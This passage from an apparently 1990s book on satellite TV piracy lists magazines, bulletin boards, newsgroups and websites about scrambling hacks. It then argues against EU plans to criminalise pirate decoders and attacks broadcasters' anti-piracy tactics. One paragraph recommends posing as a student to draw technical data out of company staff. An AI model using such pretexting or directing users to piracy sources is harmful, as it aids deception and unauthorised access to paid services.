and cable television. Among these are the titles Cable and Satellite Europe 
and Satellite and Cable Communications International. 


“Cable And Satellite Europe” was at one time the best satellite and cable 
magazine in the market. There was a balance between technology and 
business. Unfortunately this has changed for the worse over the last few 
years. It is now considered to be mainly an airhead magazine for the 
bizoids. Some hackers have even gone as far as to label it a room 
temperature IQ magazine. This is of course overkill. The magazine 
frequently carries excellent articles on cable television and legislation. 


“Satellite Trader” is the main installers magazine in the UK. It is not a 
technical magazine by any stretch of the imagination but it does have a few 
good articles every year. It is a useful magazine if you want to know what 
the channels and manufacturers are thinking as it frequently runs mundane 
pieces on industry personalities whose companies advertise in the magazine. 
However as regards signal security, it does not deal with the topic. It 
will have a WWW site in operation within the next few months. 


Many of the better mainland European magazines such as the German 
Tele-Satellit have excellent material available on the WWW. There is a 
general trend for the European magazines to have greater depth in their 
articles. This is especially the case with Infosat which seems to be one of 
the better technically orientated German satellite television magazines. 


Clearly the best European magazine on electronics is Elektor Electronics. It 
frequently covers the technology of satellite television in addition to all other 
areas of electronics. In the last few years it has carried articles on MAC, 
satellite receivers and outdoor electronics. 


Most companies in electronics crave publicity for their products and so will 
seize every opportunity for a bit of free advertising. Professional journals, 
that is those aimed specifically at engineers, designers and buyers, are the 
most reliable sources. Of course the best source of information comes from 
the specialist newsletters. It is often the case that these are very small 
operations where the editor is an expert on the subject. In some cases, the 
editor is the newsletter staff. This of course has caused massive problems 
where newsletters have been taken over and been repopulated with 
non-experts in the vain hope that it will be some reflection of glories past. 
Interventions of this type rarely have the same pace and level of insight. 


Some of the magazines intended for the public can contain some useful 
information but should be considered with caution as the data has been 
simplified, possibly by someone who has very little knowledge of scrambling 
systems. Newspapers can provide the names of the scrambling systems 
used by various cablenets. Generally it is the provincial papers that would 
carry this type of information though the national papers can sometimes 
pick it up. The person who gives this data to the journalist is almost 
invariably the system manager and non-technical. They love to boast about 
their brand new high security scrambling systems that will prevent the 
pirates from tapping their system. 
The non-technical person can be one of the most helpful sources of 
information for the hacker. In system manufacturing companies, they 
generally offer to send you the full technical data and or brochures. With 
some it is better to be a student doing a project on scrambling systems as 
people generally like helping others. The non-technical person can give 
away the full data and strengths of their scrambling systems without 
even knowing it. This kind of information acquisition has more to do with 
social engineering than published information. 


Electronic Information 


The electronic information sources are the more valuable. They are more 
immediate as the printed and video media are often between one week and 
three months out of date. The electronic information sources include bulletin 
boards and on-line information sources. 


The world of electronic information has been referred to in the Cyberpunk 
novels as “The Matrix”. This is a fairly accurate if somewhat poetic 
description. Most of the sources of electronic information are linked in some 
way. The commonest method of accessing the sources is via dial-up 
modem. Most people nowadays refer to all these interconnected systems 
as “The Net”. Of course to limit things to the internet is misleading but there 
is a feeling that all the necessary information to hack a system is there. In 
some respects, especially where the hack is in the public domain, this is 
correct. 


There are basically two forms of electronic information sources: bulletin 
boards and the internet. Naturally with the rise of the internet, the bulletin 
board or BBS is beginning to take second place. 


At its minimum, a BBS is a computer, a hard disc and a modem. It is 
possible to dial in, leave messages and upload and download files. The files 
can be anything from porn to games programs. Most of the good 
generalised boards tend to have a wide mixture. 


Each country tends to have a number of specialised satellite television 
BBSes. Many of these BBSes charge an annual fee for complete access. 
This is because the costs of maintaining a BBS are generally high. 


Special Projects BBS (+353-51-850143) is a BBS that specialises in 
satellite and cable television and scrambling. Most of the information and 
files on this BBS are free. Some are only available to subscribers. 
Usenet 


The BBS scene is small compared to the Internet. The BBSes normally 
have sysops to filter and select the files; the internet does not and as a 
result you often have to trawl through seas of files just to find what you want. 
Of course you could always use a search engine to locate information in a 
few seconds. 


There are many good books available about the internet, among them Ed 
Krol's "The Whole Internet User's Guide & Catalog". There are a number 
of relevant newsgroups which cover satellite television. The best way to 
consider these is as realms of perpetual discussion. 


These newsgroups are like huge conversations in which anyone can 
partake. Naturally there are some newsgroups where people try to keep 
some semblance of order. You can find all levels of knowledge and if the 
question is properly framed people will try to answer. Of course the one 
question not to ask in alt.satellite.tv.crypt is "where is the SEASON software 
for Sky 10?". 


Most of the newsgroups have documents that will explain most questions. 
These documents or help files are known as the FAQ. This is an acronym for 
Frequently Asked Questions. The alt.satellite.tv.crypt FAQ can be found on 
most good BBSes and FTP sites. It is also available on many WWW sites. 
The most recent edition is regularly posted on the following sites: 


http://www.hackwatch.com/~kooltek/faq.html 
http://www.iol.ie/~kooltek/faq.html 


As with any specialised subject, satellite television has specific newsgroups. 
The most important newsgroups regarding satellite are: 


alt.satellite.tv.europe 


This is the original European satellite television newsgroup. The rise of the 
SEASON hacks and general discussion on scrambling systems and hacks 
forced a split and the creation of a new newsgroup, alt.satellite.tv.crypt. The 
main traffic in the tv.europe newsgroup relates to discussions of the 
technology of satellite television and programming. 


This group can average fifty messages a day but most are crossposted 
messages that also appear on the alt.satellite.tv.crypt newsgroup. 
alt.satellite.tv.crypt 


This newsgroup was created when the traffic about hacking got too heavy 
for the original alt.satellite.tv.europe newsgroup. It is aimed at the discussion 
of scrambling systems and cryptography as applied to satellite 
television. Though normally it is a European newsgroup it has a reasonable 
proportion of North American readers. 


It does tend to attract a lot of adverts for pirate smart cards and 
programmers. Most of these devices are actually well made and work as 
advertised but as with most internet things, it is a case of caveat emptor. 


This newsgroup can have upwards of fifty messages a day so it is relatively 
mild in terms of traffic. This number can jump to two or three times that level 
when there has been a key change or a release of new decoding software. 


rec.video.satellite.europe 


This is the official newsgroup on satellite television in Europe. It is mainly 
concerned with the technology of satellite television, programming and 
links. It is not the newsgroup to post messages about scrambling systems 
and hacking. 


The traffic levels on this group have been traditionally low with most of the 
traffic appearing on the alt.satellite newsgroups. 


rec.video.satellite.dbs 


With the launch of Direct Broadcast Satellite television in North America, 
this newsgroup was created. Most of the traffic is about the DirecTv system 
though other systems are also covered. 


As this is a North American group, the traffic levels are correspondingly 
high. It is not unusual to see two hundred messages a day flowing through 
this newsgroup. 


rec.video.satellite.tvro 


This newsgroup is the North American newsgroup concerned with the big 
dishes and conventional satellite television systems, (C Band). There is not 
that much interest in the group in Europe since most of it is strictly 
Continental United States (CONUS). 


The traffic level on this newsgroup is high. This is one of the oldest 
newsgroups on the subject of satellite television. 
The World Wide Web (WWW) 


This is most people's idea of the internet. It is basically a point and click 
environment where information is only a few keypresses away. Of course you 
have got to know what keys to press and where to look. 


This is not a book on the internet. There are many books out there on how 
to set up a WWW browser and connect to an internet service provider. 
This is not one of them. The following assumes that you have got all of the 
browser and associated software running properly. 


There are basically two types of site accessible using a web browser: 
WWW and FTP. The WWW site is essentially a site that has documents, 
graphics and files. This data is arrayed in the form of pages. The highlighted 
text on these pages will allow you to access another page or download a file 
or see a picture. It is a wonderfully graphic environment. The FTP (File 
Transfer Protocol) site is basically a set of files that can be downloaded to 
your computer. The main thing you get here, if you are lucky, is a screen full 
of text descriptions of what each file is. You can download the file to your 
computer just by double clicking on the highlighted name. 

The most important thing about the WWW is that it makes things easy. 
There are no more convoluted commands to remember, just addresses that 
almost resemble English. 


What follows is a list of the important WWW sites associated with 
scrambling systems. It is by no means complete and there are frequently 
links on the pages below that will get you to other similar pages. 

http://www.hackwatch.com/~kooltek - Hack Watch News 

http://www.webshop.co.uk/wv/links.html - What Satellite 

http://www.wrn.org/tesug/welcome.html - TESUG 

http://www.scramblingnews.com - Scrambling News 

http://www.tele-satellit.com - Tele-Satellit 

http://www.gpl.net/paulmax 

http://www.paranoia.com/~defiant - Euro Satellite Hack Pages 
http://www.eurosat.com - Mirror of above with C+ ЈЕРЕС File 

http://www.xs4all.nl/~ceylon - Voyager Homepage 

http://www.cybercomm.nl/~stegen - Multimac Homepage 
http://www.wu-wien.ac.at/usr/h91/h9151382/sat - Seasoned Mac 
http://www.xs4all.nl/~pot/videocrypt.html 
http://www.iol.ie/~ctx - Cardtronics - Battery Card Dealer 
http://www.rwt.co.uk/rwthist.htm - Steve Birkill's TVRO History 
Legislation And Digital Television Piracy 


You only have to look at the Prohibition in the United States to see how 
effective strong legislation is. Indeed the present situation relating to 
narcotics laws and the availability of hard drugs is a more current example. 
Pay Television is not hard drugs. It does not kill. But have you ever heard of 
someone giving up television? 


As was explained elsewhere in this book, piracy is due mainly to lack of 
access. Regardless of whether the lack of access is due to the would-be 
viewer being outside the copyright area, or the programming being 
proscribed or the price of legitimate access being beyond most individuals, 
people will always find a way around a system. Human evolution is a history 
of finding new ways and shortcuts. Admittedly, the discovery of fire and 
finding a way to watch a scrambled porn channel are not quite equal in 
stature. 


Removing the copyright barriers would effectively stop most piracy 
immediately. It would allow someone in Germany to subscribe to BSkyB or indeed 
someone in Ireland to subscribe to Canal Plus legally. Since the 
subscriptions in these examples would be legitimate, the channels would make 
money and the film producers would get their correct royalties. However 
until the fundamental injustice of fragmented copyrights in Europe is 
resolved, the present massive scale of piracy on channels will continue to 
exist. 


Now this might sound like I am blaming the film producers for producing a 
product that lends itself so easily to piracy. I am not. What I am saying is 
that the present fragmented copyright market is the primary reason for most 
of the piracy in Europe. It is the copyrights associations who impose these 
marketing practices that are to blame for this. Of course they do make more 
money by repeatedly selling the copyrights to a number of smaller and more 
fragmented markets. 


Before the whole matter of legislating for the protection of encrypted 
services can be tackled, this matter of copyright has to be addressed. Otherwise there will 
be no real change in the levels of piracy other than the fact that it will be 
driven into the darker corners of the market and in some countries 
completely underground. Of course the widespread availability of internet 
access means that the whole piracy industry will probably be driven offshore 
out of EU jurisdiction. 


The best example of what can occur when piracy is made very much 
illegal is the present situation in the United States. Piracy of the VideoCipher 
II system is very much illegal. Of course that fact in itself has not stopped 
piracy. It has limited it somewhat but piracy still goes on. Most of the 
vendors of pirate devices have moved outside of US jurisdiction where they 
can continue to sell their devices. What may well happen with piracy on the 
European channels is that the pirates will move their operations outside of 
EU jurisdiction and the whole scene will continue without too much 
inconvenience to all except the channels. 


The European Green Paper, available on the usual satellite related WWW 
and FTP sites and also on the European Commission's WWW site 
(http://www.cec.lu/en/record/green.html), is a good attempt at trying to 
resolve a very complex situation. It is, however, based on a lot of faulty 
information and is riddled with inaccuracies. Some of the arguments are so 
full of holes that they resemble activated charcoal. Perhaps a quotation from 
another Irish writer, Jonathan Swift, best describes it: 


As learned commentators view 
In Homer more than Homer knew, 
So geographers, in Afric-maps, 
With savage-pictures fill their gaps; 
And o'er unhabitable downs 
Place elephants for want of towns. 


In preparing the green paper, which is essentially a discussion document, 
the Commission had commissioned the reports from three independent 
firms. I have grave reservations as to whether the EC got good value for 
money. As regards the technical and economic reports, it might have been 
cheaper for them to have bought a copy of the Black Book. 


Indeed judging from some of the paragraphs dealing with the economics of 
the detachable secure microcontroller, it looks like someone did. It is 
somewhat ironic. A book on piracy being pirated. But then there is no 
copyright on ideas otherwise these “consultancy” types would be in fatal 
trouble. It is of course common courtesy to acknowledge the source - 
something that they failed to do. In my opinion, the people who did the 
named reports were, in terms of piracy, complete and utter amateurs. They 
are outsiders who do not understand the causes of piracy, the technology of 
piracy or the ramifications of piracy. 


The theory that the people who carried out the consultancies are outsiders 
is strengthened by the statement that “Moreover, a specialist press has 
developed around this pirate market, providing targeted publications and 
thus also a medium for the marketing of unauthorised devices.” 


It seems that they could not tell the difference between the satellite 
television press and the specialist press. The difference is clear to anyone 
involved with satellite television. The satellite television press has exploited 
the Blackbox industry, taking adverts from pirate card and pirate decoder 
manufacturers. In the UK, the satellite television magazines are far from 
specialised and could not by any stretch of the imagination be called 
"specialist". There has been a contraction of the technical press in the UK 
over the last few years. It seems that most of the magazines for the satellite 
television industry have been taken over by people with no real background 
in the subject. As a result they are purely businesses. It seems that the days 
where the satellite magazines were filled with good articles by people who 
actually cared about the subject are gone. It is left to at best a handful of 
people to write good articles; the rest is recycled press releases and 
prospective plant growth accelerant. 


Satellite television is essentially a highly complex commercial and technical 
subject. Basically it was a case of people with no technical knowledge 
getting into writing about satellite television. These people were basically 
reporters and just treated writing about satellite television as another job. 
They had no real enthusiasm for the subject. With the tougher financial 
climate of the last few years, these satellite television magazines tended to 
contract, using more of these staff reporters rather than specialists who 
knew the subject. After all it was cheaper to pay these reporters than pay 
specialists. There is no way that these UK magazines could be considered 
as "specialist". The real technical specialist press was not particularly 
associated with satellite television. The one magazine that is effectively the 
bible of television engineers and technicians is "Television". That magazine, 
while dealing with the electronics of satellite television, has not actually 
covered the piracy aspect. At the other side of the market are the 
expensively priced weeklies and bi-weeklies, which offer some good 
analysis but again do not cover piracy or promote it. In the end, the main 
things that people buy the satellite television magazines for are the 
programme listings and the adverts. 


Of course most of the mainland European magazines are more technical. 
They could be considered to be of a more specialist nature but again they 
have taken the adverts for the pirate devices. However at heart they still 
remain magazines that are aimed at the general public that include some 
specialist articles. Therefore they could not be described as being the 
"specialist press". 
Perhaps the specialist press that the EU green paper seems to be referring 
to is the Black Book and Hack Watch News. Of course it stopped short of 
actually naming the Black Book and Hack Watch News, the only specialist 
publications in Europe of their type. 


It is easy to see how people who are not involved with the industry could 
make such mistakes over what constitutes a specialist press. But other less 
apparent, and indeed more fundamental, errors emerge. Perhaps the best 
indication is on page 2, in their Executive Summary, where they say that "a 
flourishing unofficial decoder manufacturing industry is emerging in parallel 
to that of authorised manufacturers." The statement ignores realities. The 
main basis for piracy in Europe is pirate smartcards, not decoders. Besides, 
the piracy business is not an emergent one. It has been in existence for over 
ten years now. It is worth at least a few hundred million pounds per year. 


The estimate that pirate devices represent 5 to 20% of the total number of 
devices in circulation is wrong. It is clearly much higher than this, though it is 
impossible to get a totally accurate picture of the magnitude of the problem. 


What the paper conveniently ignores is that in areas where channels are not 
licensed to operate, the rate of piracy is 100%. For a service like BSkyB, the 
rate of piracy in mainland Europe is technically 100%. For Canal Plus, the 
rate of piracy in the UK is technically 100%. For FilmNet, the rate of piracy in 
France is 100%. 


Whoever supplied the figures on piracy does not have a clue as to the 
realities of the subject. Either that or the situation is consciously being 
misrepresented in order to make it seem like the problem of piracy is not as 
bad as it is. 


There is a subtle trick here that some would sooner call a lie. The more 
cynical amongst us would recognise it as a rationalisation. 


One of the most difficult things to do in satellite television is to quantify the 
effects of piracy on a channel. Getting a channel to comment on its piracy 
problem is even more difficult. This is because the channel, by means of 
rationalisations, will attempt to portray the effects of piracy as being less 
than they really are. 


However convincing these rationalisations sound, they do not cover up the 
fact that revenue is lost as a result of piracy. It is all a question of how the 
losses to revenue are calculated. More precisely it is a matter of who the 
person doing the calculations works for. 


Fragmented copyright areas are the main contributors to piracy on a 
channel. They are also the prime excuses for the channel to portray the 
losses to revenue as being lower than they really are. The essential aspect 
here is how the loss is considered. Is it considered as a subscription that the 
channel has lost to the pirate or is it a subscription that the pirate has gained 
from the channel? The two are not the same. 


If a channel does not have the right to collect subscriptions in an area then a 
pirate card does not count as a subscription that the channel has lost to the 
pirate. The logic here is straightforward; the channel does not have the right 
to collect subscriptions so therefore how could it lose that which it is not 
entitled to? And so by this wide brushstroke, the channel can ignore all of 
the piracy outside its own copyright area. It was by this rationalisation that 
BSkyB’s management claimed on their flotation prospectus that they had no 
real piracy problem. The rest of the world wondered if they had spent too 
much time in Australia. 


Piracy within the channel's copyright area is more serious. The channel has 
the legal right to collect subscriptions in this area. If the channel loses a 
subscription to a pirate here then it is a very real loss. It is this figure that a 
channel will juggle with when trying to calculate the loss to piracy. Rarely, if 
ever, do they publish these calculations. 


With all those rationalisations and half-truths the only time that you can 
catch a glimpse of the real piracy figures is immediately after a channel 
fixes the problem. Of course the channel will be overjoyed with this sudden 
increase in their subscription levels or at least that is what their press 
releases will say. The best example of this was recently provided by BSkyB. 


Over the years of piracy that the 07 and 09 card issues spanned, BSkyB 
gave a convincing impression of an ostrich. They stuck their corporate 
heads in the sand and tried hard not to comment on the piracy problem. A 
few brief leaks nearly gave the game away. One of these came as part of an 
affidavit by BSkyB's deputy head of legal and business affairs. The affidavit 
was inaccurate about the scale of piracy in the UK, but then BSkyB never 
really had a clue about the scale of the problem. What it did say was that 
BSkyB was confident of regaining users of pirate cards in the UK once a 
new card was introduced. 


In the last three months of 1995, BSkyB, according to their own press 
release, obtained some 170000 new subscribers to their DTH services. 
What this release failed to say was that BSkyB had switched to a new card 
issue (10) on 31-10-95. 


Throughout the 09 period they were averaging a loss of subscribers, if the 
Over The Air traffic was anything to go by. The 09 card had been 
compromised since October 1994. This meant that there was a year of utter 
piracy on the VideoCrypt system - a complete year of lost revenues in 
BSkyB's copyright area and in the greater European market. 


This is where the figures become questionable. Or more precisely, this is 
where questionable figures become downright iffy. The normal reaction of 
the pirate viewers in the event of a card change is to acquire a legitimate 
card by Grey Market means. Or if they live in the UK or Ireland, they take 
out a legitimate subscription. Now how can a channel quantify the number 
of their subscribers who are really Grey Market subscribers? Could they 
stand to lose what could be a significant percentage of their subscribers? 


The problem here is whether these 170000 new subscribers were people 
who had resubscribed after dropping their subscriptions during the time the 
pirate cards were available or were genuine new subscribers. In realistic 
terms, BSkyB should have had at least 400000 new subscribers in the 
period if things had gone according to their theory. 


Given that the users of pirate cards had more confidence in the hackers and 
pirates, a lot of pirate card users would not have subscribed to the whole 
package. Instead they would have subscribed to the Multichannels and 
perhaps the sports channels. And what happened to the millions of viewers 
in Mainland Europe? Well if you believe the channel, they never existed. 
After all how could the channel lose money to pirates in these countries 
when they do not officially collect subscriptions? That is a problem for the 
copyrights associations, not the channels. The reason why things did not go 
according to BSkyB's theory was that the same movies were on the 
D2-MAC EuroCrypt channels, which were still hacked. 


The speculation that the consumers would be misled over the provenance 
of the pirate devices is rather childish. It is a typical feint with the intention of 
drawing attention away from the fact that these people are plainly clueless. 
Most pirate devices are marketed as pirate devices. In fact it is often easier 
to purchase a pirate device than it is to purchase an official device. 


The figures quoted in the table of subscribers to the main pay television 
stations are wrong in that they have no entries for Ireland. Sky One, Sky 
News, MTV and TCC are part of the lowest tier on Cablelink's net. Cablelink 
has over 400,000 subscribers in Ireland. So this is a large number to have 
gone missing. The satellite subscribers are also ignored. It seems that 
those responsible for the figures, the European Audiovisual Observatory, 
have reintegrated the UK with Ireland. There are some people in Ireland 
who will not be pleased. 


Some of the speculation in the paper would be comical if it was not so 
pathetic. A particular example of this is where the paper refers to the loss of 
credibility to a supplier of technology that a hack causes and how a high 
incidence of pirate devices might be construed as evidence that a system is 
not very effective. 


These people do not live in the real world! If a system is hacked, then it is 
impossible to consider it secure. If there are a lot of pirate devices then it is 
proof that the system is not very effective. 


Hiding the facts behind a smokescreen of platitudes is what has been going 
on with hacked channels for the last few years. The people who framed this 
document appear to be too worried about upsetting the victims of piracy. 
Serious questions as to their knowledge of the subject and fitness to 
undertake such a task should be asked. The document, in places, sounds 
more like a broadcaster's wish list. But then that is not surprising: the 
broadcasters spend a lot of money lobbying the European Commission and 
indeed the governments of the countries where they operate to draft 
legislation that favours their position. 


While the paper seems to take some notice of the Council of Europe 
recommendations on piracy, the one thing that it does not specifically 
mention is the option of the hacked service taking legal action against the 
company that sold it the hacked encryption system. 


It is now common practice to have companies who supply scrambling 
systems on a performance contract. If the system gets hacked then these 
companies do not get paid. But if it can be established that these scrambling 
system manufacturers knowingly used technology and techniques that they 
knew to be compromised then they should be liable to prosecution. 


In section 2.1, the paper's claim that disclosure, in a court case, of the 
software in the official smart card in order to prove infringement would 
result in further copying is based on a faulty understanding of what 
happened in BSkyB & News Datacom vs David Lyons, otherwise known as 
the Dublin Court Case. 


In this case it was proposed to the court and BSkyB & News Datacom's 
counsel that David Lyons' software would be disclosed in confidence to a 
court appointed expert if News Datacom would also disclose in confidence. 
Needless to say News Datacom did not disclose. It was a game of chicken 
and BSkyB and News Datacom lost. 


The point here is that it should be possible to disclose the algorithm without 
a valid set of keys. The algorithm should be strong enough to resist attacks 
on its own. Had such an approach been adopted by News Datacom, 
instead of security by obscurity, then many of the problems created by 
that case would probably not exist. 
The document makes reference to the DVB experts' group on the piracy of 
encrypted services. The only thing that these people seem to be expert on 
is developing systems that keep getting hacked. Now I think that 
makes them experts on being pirated rather than experts on piracy. It brings 
to mind sheep discussing the order of the wolves' menu. I am not sure if 
these are the people behind the recommendation that the possession of 
pirate digital decoders or devices should be criminalised. It seems that this 
recommendation is based on ignorance of what enforcing such an option would entail. 
They have probably been watching Sky One for too long. 


It is also the basis for the creation of mediocre security systems. Piracy is a 
very good test of how successful a channel or service is. Pirates do not 
attack unpopular channels. Of course the more important thing here is that 
the criminalisation of the possession of pirate decoders would allow the 
perpetuation of mediocre systems. 


The idea of criminalising the possession of a piece of electronics is, to say 
the least, repulsive. It is like these people have something to fear from 
technology. Perhaps it is, in a word, technofear. It would be interesting to 
see exactly how technical the people behind this idea are. They seem to be 
Neo-Luddites. 


They see their controls failing as society casts aside the chains that bound it 
for the last few hundred years. Technology is having a liberating influence 
and these people don't like it. It seems that they want to impose a 
technological dictatorship where all access to iffy information and 
technology is carefully controlled. They probably would be more at home back in 
Mao's Communist China. 


At the heart of this argument is what constitutes a pirate digital decoder. 
Perhaps the simplest explanation is that it is a device that is used to gain 
unauthorised access to a service. The definition would also include pirate 
smartcards. Of course the idea that possession of such a device should be 
criminalised is easy to come up with, especially if a channel has had legal 
actions collapse in courts. 


Considered in this light it is a knee-jerk reaction to the failure of these court 
cases. The reality however is that most of these court cases collapse 
because of the managerial incompetence and lack of knowledge by the 
people responsible for taking the action in the first place. You tend to come 
to this conclusion when you hear arguments in court that “the magnetic 
stripe in the smart card had been copied”. Of course these actions are all 
civil law actions and not criminal law. By criminalising the situation, it would 
place the matter in the hands of the police thus simplifying things 
considerably for the channels. 
It is an idea without a hint of justice, intended to cover the fact that the 
system that allowed it to happen in the first place was mediocre at best and 
irresponsibly designed at worst. It seems the concepts of justice and 
fairness matter little to those whose bottom line is that of the balance sheet. 


Criminalising the possession of pirate digital decoders and subsequently 
allowing for their seizure is fundamentally wrong both logically and 
financially. It would be a far more elegant solution to turn someone in 
possession of a pirate digital decoder into a legitimate subscriber by court 
order. In that way they would have to subscribe to the hacked service for a 
year or so. So rather than the service losing revenue, they would gain 
revenue. The user of the pirate decoder gets to watch what he wanted and 
the service gets money. It is perhaps a druidic interpretation of things. But it 
should be remembered that a channel is in business to make money not to 
make criminals. 


The flawed thought processes of those who would criminalise the 
possession of pirate decoders are apparent in the arguments used about illicit 
drugs. The people who advocate the criminalisation of the possession of 
pirate decoders obviously have not paid any attention to the way that the 
same logic has been disastrous with the drugs problem. 


Europe has the most vibrant satellite television business in the world. It is 
so because of piracy and an almost complete lack of centralisation. There 
are perhaps more systems used in Europe than anywhere else. These 
systems have been tested both by the market and by the hackers and 
pirates that attack them. The manufacturers, if they are lucky, learn how to 
improve their systems so that they become more secure. They end up with a 
product that can be marketed world-wide. Of course some manufacturers 
fail because their system is too insecure but this can be considered 
technological Darwinianism - evolution in progress. 


The other aspect of the criminalisation of pirate decoders is that it is aimed 
specifically at the citizen of the European Union. Perhaps the people in the 
European Commission should realise that they are working for us - the 
people and not for the broadcasters. If enough people are criminalised, then 
life will become very unpleasant for the people responsible in the European 
Commission and elsewhere. 


A more worrying trend here is marked by its omission. What will happen to 
the people who have an interest in how these things work? If some of the 
people working for the broadcasters had their way, nobody would know 
anything about their systems. The ramifications of this are staggering. 
At the worst, engineers and technicians would be unable to examine the 
technology or systems without the risk of being criminalised. People would 
not be able to examine their systems and understand how they work, or carry 
out experiments. 


It would throw a potential industry back to the Stone Age. Knowing how 
things work is an essential part of building any system. There would be no 
more new systems, other than those produced by the broadcasters. 


There are the possible spin-off industries that can be, and have been, 
created. Some pirates and hackers have come up with systems that are 
more secure and elegant than the ones they have hacked. Some have even 
explained how to make systems more secure. To put it simply, hacking 
expands Human Knowledge. That is a good thing except to those who 
would seek to limit it. 


European companies can either build on the massive array of experience in 
signal security/insecurity that has been built up over the last ten years or the 
Commission can render all of that expertise and potential taxation revenue 
void with stupid and ill-conceived legislation. 


There are however some indications of light breaking through. The 
comment that the Commission is considering establishing an organisation 
for control and certification of security systems independent of public 
authorities is interesting. This is a worrying spectre of a European Big 
Brother operation. But it does offer some hope that there will be some 
analysis of the access control systems used on Digital Television systems 
instead of the security by obscurity approach that seems to be the norm at 
present. 


The European Commission can draft fair legislation that will benefit the 
channels and the citizens of Europe equally. Or it can take the heavily 
biased advice of the incompetent fools who let the piracy situation develop 
in Europe over the last ten years. 


The events of the D2-MAC EuroCrypt fiasco do not inspire confidence. It 
was an attempt to protect European jobs and industries but it definitely went 
against the market. The relevant commissioner at the time was heavily 
quoted as relying on the advice of the main manufacturers of D2-MAC 
equipment and chipsets. It was not the wisest of statements even if the 
intentions were good. However the current situation is different. It is not 
about protecting jobs. It is about implementing legislation that will protect the 
channels and will also ensure a fair treatment for the subscribers to these 
channels and services. 
Some of the suggestions, made by the channels and their cohorts, are 
clearly wrong. The criminalisation of the possession of pirate decoders and 
smart cards is just one of these. It demonstrates shortsightedness because 
instead of creating a subscriber, they create an enemy. The channels 
should terminate the persons responsible for this suggestion. 


Counter-Piracy Today 


From the events that followed the hack on 07 VideoCrypt, it was evident that 
Sky and News Datacom did not have any real counter-piracy program. They 
had strangely removed Ken Crouch and his department. In fact it seemed 
after the demise of Sky's only counter-piracy operation that their new 
operation was run by ordinary people. Perhaps they were lawyers and some 
security consultancy but they were by no stretch of the imagination 
counter-pirates. In the terms of the Blackbox Industry they were JAFAs. If 
they were anything other than JAFAs the 07 hack would not have had the 
effect that it had. 


It has become clear from court actions that the people used for these 
operations by Sky are generally ex-police. The problem here is that the idea 
of counter-piracy has become confused with that of anti-piracy. 
Counter-piracy by its nature is intended to limit piracy or redirect it in a useful 
manner. Anti-piracy, with all of the negative connotations, is designed to 
completely eradicate piracy. Basically it is the search for the Holy Grail of a 
totally secure system with no piratical users. Anti-piracy is also a term 
beloved by the clueless. 


The whole situation of fighting piracy has become very dirty over the last few 
years. Even in areas where the channel is protected by law, there is still the 
aspect of proof that continues to cause problems for the channels. It is not 
sufficient for those working for a channel to allege that someone is involved 
with pirate devices. They have to present proof. This means a lot of 
paperwork and investigation. 


Where a system is massively compromised, as the Sky 07 and 09 were 
and D2-MAC EuroCrypt-M is, it is not economically viable to pursue all of 
the pirates and pirate card users. Therefore the anti-pirates have to target 
those whom they have a reasonable chance of getting a court to convict. 


It is now a common practice to try and insinuate that hackers and pirates 
are involved in things other than piracy. The commonest seems to be the 
allegation that the hacker or pirate is involved in manufacturing phonecard 
emulators. These anti-pirates generally trade on the credibility of their 
ex-police background by approaching contacts in the relevant telecoms 
company or police force with these “tip-offs”. 


Of course false allegations are not the only tool that these anti-pirates use. 
They also actively set up pirates and then invite the cooperation of the 
relevant police. The normal approach is that a pirate with the necessary 
software is approached with a deal that is, on the surface, too good to be 
true. Then the scheduled hand-over is replaced by a raid from the relevant 
police force. 


Depending on the jurisdiction, this kind of approach would be termed 
entrapment and the legal status of such a raid may vary from country to 
country. It is especially complicated by the fact that the channel may not 
have any legal protection other than copyright under the country's law. In 
fact some people have commented that some of these cases may be void 
as there was no actual fraud taking place other than the misrepresentation 
by the anti-pirates and the fact that they were intent on stealing the software 
developed by the hackers and pirates. Now it would be interesting if some of 
the hackers and pirates who are victims of such attempted entrapment 
decide to take a case against these anti-pirates for fraud and 
misrepresentation. 


Indeed some of the tactics used by these anti-pirates seem questionable in 
law. It would not be unthinkable to see a case brought on evidence supplied 
by these people being thrown out. There would have to be a very clear 
distinction between the channel and the company undertaking the 
anti-piracy. If a situation went bad and the channel was implicated directly, the 
press would have a feeding frenzy. 


There are too many unverifiable rumours, cash bribes to serving officers, 
illegally tapped phonelines, private detectives masquerading as customers, 
compromised people being rapidly relocated. There is a very real possibility 
that the tactics used are illegal and if these rumours were to turn into 
verified facts, these people and their accomplices would be up on charges. 


It is also in the best interests of the anti-pirates to have a third party involved 
as the legal entity executing the raid. This has special relevance in the case 
of an Anton Piller order. This is an order whereby the premises of a pirate can 
be searched for evidence of copyright infringement. There are some 
controls associated with the granting of one of these orders. The most 
important is that it cannot be used as a licence for a fishing expedition. In 
other words, it cannot be used to see what charges can be laid later. The 
way that the anti-pirates get around this is by using a third party and then 
“helping” the third party by being their advisors on copyright infringements. 
Most of these questionable actions are necessary because the channels 
cannot avail of the legislation in countries other than where their signal 
originates. The legislation in most countries in Europe only protects 
channels that broadcast from that country. It does not protect foreign 
channels. 


Other channels seem to be learning from the mistakes of News Datacom 
and Sky. Though it is believed that they still have not created an adequate 
counter-piracy program yet, France Telecom are trying to fight the hacks on 
their EuroCrypt system. With EuroCrypt, it would seem that the strongest 
part of the system is ignored and left virtually unused. If a channel does not 
use a system properly, then it will be hacked. It would be better if the 
channels actually used the system properly rather than involving snakeoil 
salesmen to try and sort out the problems of piracy by legal means. 


Perhaps the main problem with many channels is that they believe that their 
own people, specifically their corporate security people, can stop hacking. 
Hacking and piracy are things that many of these corporate security types 
have little understanding of. The knowledge and tactics required to limit 
piracy can only be gained in one way. 


The idea that a career in law enforcement prepares someone for counter-piracy
operations is wrong. Such people generally see things in black and
white and have relatively straitjacketed minds. As a result they tend to go
for the legal options to eliminate piracy. This approach is both clearly wrong
and very dangerous. Nowhere was this better illustrated than when DirecTv
announced that it would stop Grey market sales in Canada with court
actions. This move displayed a breathtaking incomprehension of the
distinction between Grey market piracy and Black market piracy. Grey
market piracy, properly exploited by the channels, can reduce the effects of
Black market piracy.


With the unified legislation on piracy in Europe, things will evidently worsen. 
Satellite piracy, through the abject incompetence and failure of the 
channels, has only gone from strength to strength. The channels are the 
ones who must sort this problem out by using properly designed and 
deployed systems. Then if there is piracy, the governments may be inclined 
to protect the channels with legislation. 


With the unified legislative area in Europe, such extreme measures may
well become unnecessary. However the fact that Europe will remain a
fragmented copyright area for the near future leads to the conclusion that
piracy will continue regardless of legislation. Perhaps the European
Commission will have the sense to ask the rights organisations to implement
a single copyright area before the relevant legislation is drafted. Furthermore
the Commission should make it a condition for implementing this legislation.
Otherwise the impression that the broadcasters have paid for this piece of
legislation will persist.


Unless these channels become actively involved in protecting themselves, 
